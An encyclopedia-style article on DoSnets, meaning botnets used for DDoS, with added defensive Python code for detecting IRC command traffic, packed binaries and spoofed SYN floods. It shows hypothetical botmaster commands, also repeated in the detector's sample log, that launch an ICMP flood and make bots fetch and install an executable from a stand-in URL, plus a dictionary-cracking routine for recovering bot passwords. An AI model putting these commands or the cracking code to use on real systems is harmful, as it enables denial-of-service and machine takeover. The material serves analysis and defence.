Dosnet
A DoSnet is a type of botnet (a form of malware). The term is mostly used for malicious botnets, while benevolent botnets are usually simply called botnets. Dosnets are used for distributed denial-of-service (DDoS) attacks, which can be very damaging.
They range in size from a couple of bots to a few thousand bots, up to over a hundred thousand bots.
Many dosbots use the IRC protocol, but some use their own custom protocols, and some use a decentralized P2P network. When IRC is used, the botmaster often sets usermode +i (invisible), and the channel often carries modes such as +psntk (private, secret, no external messages, topic changeable only by operators, and a key required to join). Sometimes the network is hosted on a public IRC network, while more capable botmasters host it on private servers.
More advanced dosnets use SSL/TLS connections and other cryptography to hinder packet sniffing, data inspection, and analysis of the command traffic.
The botmaster can use the bots to "packet" (send a disruptive data flood at) other computers or networks. He or she can often also make them perform other tasks, such as fetching a new version of the bot software and updating themselves.
Well-known dosnet software includes TFN2k, Stacheldraht, and Trinoo.
There are dosnet hunters who find dosnets and analyze the bots and/or the network in order to dismantle them, for example by obtaining access to the bots and commanding them to "uninstall" themselves if the bot software has such a feature, to "update" themselves to a dud, or to download and execute some sort of cleaner. Advanced bots may use cryptographically signed updates to verify that an update is authentic, so that a hunter or rival cannot push a replacement binary without the signing key.
Botmaster
The botmaster is the person who controls these bots (drones). He or she usually connects to the network via proxies, bouncers or shell accounts to hide his or her IP address, and uses a password to authenticate. Once the bots have verified the password (and possibly other authentication criteria), they are under the botmaster's command.
Sometimes the botnet is shared, and multiple botmasters operate it together.
A botmaster may be a skilled black hat hacker or just a script kiddie.
Sometimes botmasters hijack bots from another botmaster's dosnet by analyzing the bot or the network, discovering the password, and commanding the bots to "update" themselves to a version under the hijacker's control.
Hypothetical example usage
.login my54kingdom78
.icmpflood 192.0.2.123 3500
.update https://www.example.com/lolcat/mudkipz.exe
The botmaster first authenticates to the bots with the password, then orders an ICMP flood against 192.0.2.123, and finally tells the bots to fetch and install a replacement binary from the given URL.
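The following is an added example and not code from the original article: a small IRC line parser with two detection heuristics drawn from the description above, a channel locked down with modes such as +psntk, and PRIVMSG bodies that begin with a bot command prefix (dot, exclamation mark or at sign) followed by a verb like login, icmpflood or update. The nicknames, channel name and log lines are constructed for the example, and the verb list is an assumption built from the hypothetical usage above plus common flood names.

```python
"""Heuristics for spotting dosnet command-and-control traffic on IRC.

Added example, not code from the original article. It parses raw IRC lines
(RFC 1459 framing) and flags two things the article describes: a channel
locked down with modes such as +psntk, and PRIVMSG bodies that begin with a
bot command prefix ('.', '!' or '@') followed by a verb like login, icmpflood
or update. Nicknames, channel and log lines are constructed; the verb list is
an assumption drawn from the article's hypothetical usage plus common flood
names.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

BOT_VERBS = {"login", "icmpflood", "udpflood", "synflood", "update", "uninstall"}
LOCKDOWN_MODES = set("psk")  # private, secret, key required: all three set is suspicious
COMMAND_RE = re.compile(r"^[.!@]([a-z]+)\b", re.IGNORECASE)


class IrcLine(NamedTuple):
    prefix: Optional[str]    # "nick!user@host" or server name, without the ':'
    command: str             # e.g. PRIVMSG, MODE (upper-cased)
    params: List[str]        # middle parameters
    trailing: Optional[str]  # text after the first ' :', the body for PRIVMSG


def parse_irc_line(raw: str) -> IrcLine:
    """Split '[:prefix] COMMAND params [:trailing]' into its parts."""
    line = raw.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        raise ValueError("no command in IRC line: %r" % raw)
    return IrcLine(prefix, parts[0].upper(), parts[1:], trailing if sep else None)


def c2_indicators(lines) -> List[Tuple[str, str]]:
    """Return (reason, raw_line) for every line matching a C&C heuristic."""
    hits = []
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg.command == "MODE" and len(msg.params) >= 2:
            target, modes = msg.params[0], msg.params[1]
            if target.startswith("#") and modes.startswith("+") and LOCKDOWN_MODES <= set(modes[1:]):
                hits.append(("channel %s set %s" % (target, modes), raw))
        elif msg.command == "PRIVMSG" and msg.trailing:
            m = COMMAND_RE.match(msg.trailing)
            if m and m.group(1).lower() in BOT_VERBS:
                hits.append(("bot command %s" % m.group(1).lower(), raw))
    return hits


# Constructed sample: a botmaster locking a channel and driving bots, mixed
# with ordinary chatter that must not be flagged.
SAMPLE_LOG = [
    ":master!u@203.0.113.5 MODE #lolcat +psntk s3cr3t",
    ":master!u@203.0.113.5 PRIVMSG #lolcat :.login my54kingdom78",
    ":master!u@203.0.113.5 PRIVMSG #lolcat :.icmpflood 192.0.2.123 3500",
    ":alice!u@198.51.100.7 PRIVMSG #chat :hi everyone. how are you?",
    ":master!u@203.0.113.5 PRIVMSG #lolcat :.update https://www.example.com/lolcat/mudkipz.exe",
    ":bob!u@198.51.100.9 MODE #chat +nt",
]

if __name__ == "__main__":
    for reason, raw in c2_indicators(SAMPLE_LOG):
        print("%-32s %s" % (reason, raw))
```

On the sample log this flags the +psntk channel setup and the three dot-prefixed commands while leaving the ordinary chat line and the harmless +nt mode alone. The verb match is deliberately tight (prefix, then a known verb, then a word boundary) because a bare prefix check would fire on every sentence that starts with a dot or an @-mention; in practice the list of verbs is tuned per bot family.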
Dosbot
The dosbot (denial-of-service bot, also called a distributed denial-of-service agent) is the client that connects to the network and the software that carries out the attacks. The executable is usually stripped of symbols and compressed with an executable packer (such as UPX) to obfuscate its contents and hinder reverse engineering. Stock UPX packing is only a speed bump, since the same tool unpacks such a file (upx -d) unless the packer has been modified.
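As an added example (not code from the original article or from any of the tools it names), here is the triage check an analyst runs on a suspected dosbot before reverse engineering it: look for the literal markers a stock UPX build leaves in the file (the UPX0/UPX1 section names and the UPX! magic) and measure the Shannon entropy of the file body, which compression or encryption pushes towards 8 bits per byte. The two byte strings are constructed stand-ins for a plain and a packed binary, not real executables.

```python
"""Triage check for a packed executable.

Added example, not code from the original article. Two cheap signals an
analyst uses before reverse engineering a dosbot binary: the literal markers
stock UPX leaves in a packed file ('UPX0'/'UPX1' section names and the
'UPX!' magic) and the Shannon entropy of the file body, which compressed or
encrypted data pushes towards 8 bits per byte. The byte strings below are
constructed stand-ins, not real binaries.
"""
import hashlib
import math
from collections import Counter
from typing import List

UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def upx_markers_present(data: bytes) -> List[str]:
    """Which of the stock UPX markers occur anywhere in the file."""
    return [m.decode() for m in UPX_MARKERS if m in data]


def looks_packed(data: bytes, entropy_threshold: float = 7.0) -> dict:
    """Combine both signals; a hit is a reason to unpack, not a verdict."""
    ent = shannon_entropy(data)
    markers = upx_markers_present(data)
    return {
        "entropy": round(ent, 3),
        "upx_markers": markers,
        "packed": bool(markers) or ent >= entropy_threshold,
    }


def _pseudo_random(n: int, seed: bytes = b"dosbot") -> bytes:
    """Deterministic high-entropy filler standing in for compressed code."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed samples: a "plain" body of repetitive text, and a "packed" body
# that carries UPX section names around a high-entropy payload.
PLAIN_SAMPLE = b"This program cannot be run in DOS mode.\r\n" * 64
PACKED_SAMPLE = b"UPX0" + b"\x00" * 12 + b"UPX1" + _pseudo_random(4096) + b"UPX!"

if __name__ == "__main__":
    for name, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(name, looks_packed(sample))
```

Whole-file entropy is coarse; on a real binary the same function is run per section so that a small packed stub next to a large resource section does not hide, and a custom or renamed packer leaves no UPX strings at all, which is why the entropy signal is kept alongside the marker scan.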
It is usually coded to start automatically every time the computer (re)starts, and to hide itself. Authentication is usually done by comparing the supplied password against a plaintext string or a cryptographic hash (such as MD5 or SHA-1), which may be salted for additional security. Since the comparison value ships inside the executable, anyone who obtains a copy of the bot can attempt to recover the password offline: a plaintext string needs no recovery at all, and a salt only defeats precomputed tables, so a weak password still falls to a dictionary attack.
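The following is an added example, not code from the original article or from any real bot, showing the two password designs just described from the dosnet hunter's side: the weak design (an unsalted MD5 literal in the binary compared as a string) beside a salted design with a constant-time comparison, and the offline dictionary attack that a hunter or rival botmaster runs once the hash has been pulled out of the executable. The password is the one from the hypothetical usage above; the salt and the word list are constructed for the example.

```python
"""Weak versus salted password checks in a dosbot, from the hunter's side.

Added example, not code from the original article. The article says a bot
verifies the botmaster's password against a plaintext string or an MD5/SHA-1
hash, possibly salted. Below, the weak design (an unsalted MD5 literal in
the binary, compared as a string) sits beside a salted SHA-256 design with a
constant-time comparison, followed by the offline dictionary attack a dosnet
hunter or rival botmaster runs once the hash has been pulled out of the
executable. The password (from the article's example usage), the salt and
the word list are constructed for the example.
"""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


# Weak design: the bot ships this literal and does md5(input) == literal.
WEAK_STORED_HASH = md5_hex("my54kingdom78")


def weak_verify(candidate: str) -> bool:
    """Unsalted, and a plain string compare that is not timing-safe."""
    return md5_hex(candidate) == WEAK_STORED_HASH


def make_salted_record(password: str, salt: Optional[bytes] = None) -> Dict[str, bytes]:
    """Salted SHA-256 over salt||password; each bot gets its own random salt."""
    salt = os.urandom(16) if salt is None else salt
    return {"salt": salt, "digest": hashlib.sha256(salt + password.encode()).digest()}


def salted_verify(record: Dict[str, bytes], candidate: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.sha256(record["salt"] + candidate.encode()).digest()
    return hmac.compare_digest(digest, record["digest"])


def crack_unsalted_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """One MD5 per guess; the same list of guesses works against every bot."""
    for word in wordlist:
        if md5_hex(word) == target_hex:
            return word
    return None


def crack_salted(record: Dict[str, bytes], wordlist: Iterable[str]) -> Optional[str]:
    """The salt is in the binary too, so a weak password still falls; the salt
    only forces the attacker to redo the work for each bot."""
    for word in wordlist:
        if salted_verify(record, word):
            return word
    return None


# Constructed word list of the kind a hunter would try first.
WORDLIST = ["password", "letmein", "trinoo", "my54kingdom78", "stacheldraht"]

if __name__ == "__main__":
    print("unsalted md5 cracked:", crack_unsalted_md5(WEAK_STORED_HASH, WORDLIST))
    record = make_salted_record("my54kingdom78")
    print("salted sha256 cracked:", crack_salted(record, WORDLIST))
```

Both cracks succeed on the sample word list, which is the point: hashing and salting raise the cost of recovering the password from a captured bot but do not protect a guessable one, and when the command channel is unencrypted the password is also visible in the clear to anyone sniffing the IRC traffic, hash or no hash.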
Sometimes dosbots are installed together with a rootkit to prevent the bot from being detected.
They can often perform more than one kind of attack, including TCP, UDP and ICMP floods. Advanced bots may use raw sockets to construct custom packets in order to perform SYN floods and other spoofing attacks, forging the source IP address so that the flood cannot simply be traced or filtered by sender.
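As an added example on the defender's side (not code from the original article), here is the half-open handshake tally used to recognise a spoofed SYN flood in a packet summary: SYNs that a client sent but never followed with its ACK are counted per destination, and a flood built with raw sockets and forged sources shows up as many half-open handshakes from many distinct addresses against one port. The capture is constructed from documentation address ranges.

```python
"""Half-open handshake tally for spotting a spoofed SYN flood.

Added example, not code from the original article. It consumes a packet
summary of (src, dst, tcp_flags) tuples, tracks handshakes that a client
opened with SYN but never completed with its ACK, and reports per
destination. A flood built with raw sockets and forged source addresses
shows up as many half-open handshakes from many distinct sources against one
port; a busy but healthy service shows SYNs matched by completing ACKs. The
capture below is constructed from documentation address ranges.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

Packet = Tuple[str, str, str]  # (source, destination, flags such as "S", "SA", "A")


def syn_flood_report(packets: Iterable[Packet], min_half_open: int = 100,
                     min_sources: int = 50) -> Dict[str, dict]:
    """Per-destination counts of SYNs, half-open handshakes and distinct sources."""
    pending = set()  # (src, dst) pairs that sent SYN and have not yet ACKed
    stats = defaultdict(lambda: {"syn": 0, "completed": 0, "sources": set()})
    for src, dst, flags in packets:
        if flags == "S":                                # client opens a handshake
            pending.add((src, dst))
            stats[dst]["syn"] += 1
            stats[dst]["sources"].add(src)
        elif flags == "A" and (src, dst) in pending:    # client's third packet
            pending.discard((src, dst))
            stats[dst]["completed"] += 1
        # "SA" from the server and everything else is not needed for the tally
    report = {}
    for dst, s in stats.items():
        half_open = s["syn"] - s["completed"]
        report[dst] = {
            "syn": s["syn"],
            "half_open": half_open,
            "sources": len(s["sources"]),
            "flooded": half_open >= min_half_open and len(s["sources"]) >= min_sources,
        }
    return report


def constructed_capture() -> List[Packet]:
    """Twenty legitimate handshakes to one server, 200 spoofed SYNs to another."""
    pkts: List[Packet] = []
    for i in range(1, 21):
        client, server = "198.51.100.%d" % i, "192.0.2.11:443"
        pkts += [(client, server, "S"), (server, client, "SA"), (client, server, "A")]
    for i in range(200):
        # forged sources: a spoofed SYN never gets its SYN-ACK, so no ACK follows
        pkts.append(("203.0.113.%d" % (i % 256), "192.0.2.10:80", "S"))
    return pkts


if __name__ == "__main__":
    for dst, row in syn_flood_report(constructed_capture()).items():
        print(dst, row)
```

The source-count condition is what separates a spoofed flood from a single misbehaving client or a scanner; with real captures the same tally is kept over a sliding time window, since half-open entries on a healthy server are cleared within a round trip, and the thresholds are set from the service's normal SYN rate rather than the defaults used here.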
Computers infected with dosbot agents are referred to as "zombies".
The vast majority of bots are written in the C or C++ programming languages.
Some newer bots are delivered via Java applets: when a user with Java enabled visits a malicious web page, the applet runs and installs the bot, which then connects the machine to the DoSnet and awaits commands.
Commands for the bot may use a prefix such as an exclamation mark (!), an at sign (@), or a dot (.).
It may try to terminate the processes of known antivirus and antimalware software in order to protect itself. It may disable security and update services.
It may copy itself into a randomly named file, or disguise itself with a name similar to a system service/process.
It may attempt to remove rival malware in order to prevent the system from behaving suspiciously.
It may try to disable the firewall, or add rules to open certain ports or allow certain connections.
It may include anti-debugging functionality.
See also
- Botnet
- Denial-of-service attack
- Malware
- Zombie computer